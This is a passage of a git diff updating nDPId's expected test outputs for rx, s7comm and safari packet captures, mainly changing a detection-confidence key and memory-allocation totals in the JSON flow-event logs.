00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299986,"flow_last_seen":1460647299986,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1460647299986,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1460647299986,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460647299986,"pkt":"PIqwbTfwAAjK968mCABFAAA89w8AAEARlWKDctuowKfOfBtZG1gAKKOI1w+zMFwiT7QAAAABAAAAAQAAAAEBBQAAAAAAAQABAAQ="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1460647300017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1460647300017,"pkt":"AAjK968mPIqwbTfwCABFAABeUWIAADoRQO7Ap858g3LbqBtYG1kASjJ01w+zMFwiT7QAAAABAAAAAAAAAAECIgAAXV0AAQAAAAAAAAABAAAAAQAAAAAGAQEAAAAAAAWkAAAFpAAAABAAAAAB"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299986,"flow_last_seen":1460647300017,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647300017,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299986,"flow_last_seen":1460647300017,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647300017,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1460647300017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647300017,"pkt":"PIqwbTfwAAjK968mCABFAABd9xIAAEARlT6DctuowKfOfBtZG1gASacR1w+zMFwiT7QAAAABAAAAAAAAAAICIQAAAAAAAQAAAAAAAAABAAAAAAAAAAEHAAAAAAAAFjwAAAWkAAAAEAAAAAQ="} 
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1460647299986,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":2302,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1460647299704,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":9058,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1460647299605,"flow_last_seen":1460647300326,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":8785,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1460647299986,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":2302,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1460647299704,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":9058,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1460647299605,"flow_last_seen":1460647300326,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":8785,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","packets-captured":132,"packets-processed":132,"total-skipped-flows":0,"total-l4-payload-len":20931,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1460647320158} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 132/132 @@ -39,9 +39,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877511 bytes -~~ total memory freed........: 5877511 bytes -~~ total allocations/frees...: 118262/118262 +~~ total memory allocated....: 6011145 bytes +~~ total memory freed........: 6011145 bytes +~~ total allocations/frees...: 121024/121024 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 1899 chars diff --git a/test/results/s7comm.pcap.out b/test/results/s7comm.pcap.out index dc12ca3cb..dbd0940bb 100644 --- a/test/results/s7comm.pcap.out +++ b/test/results/s7comm.pcap.out 
@@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1408528803880} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7580000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}} 
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","packets-captured":55,"packets-processed":55,"total-skipped-flows":0,"total-l4-payload-len":2290,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1408528804016} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 55/55 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871038 bytes -~~ total memory freed........: 5871038 bytes -~~ total allocations/frees...: 118169/118169 +~~ total memory allocated....: 6004672 bytes +~~ total memory freed........: 6004672 bytes +~~ total allocations/frees...: 120931/120931 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 685 chars diff --git a/test/results/safari.pcap.out b/test/results/safari.pcap.out index e8d57ef4d..dfa752d05 100644 --- a/test/results/safari.pcap.out +++ b/test/results/safari.pcap.out 
@@ -4,9 +4,9 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"} 
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 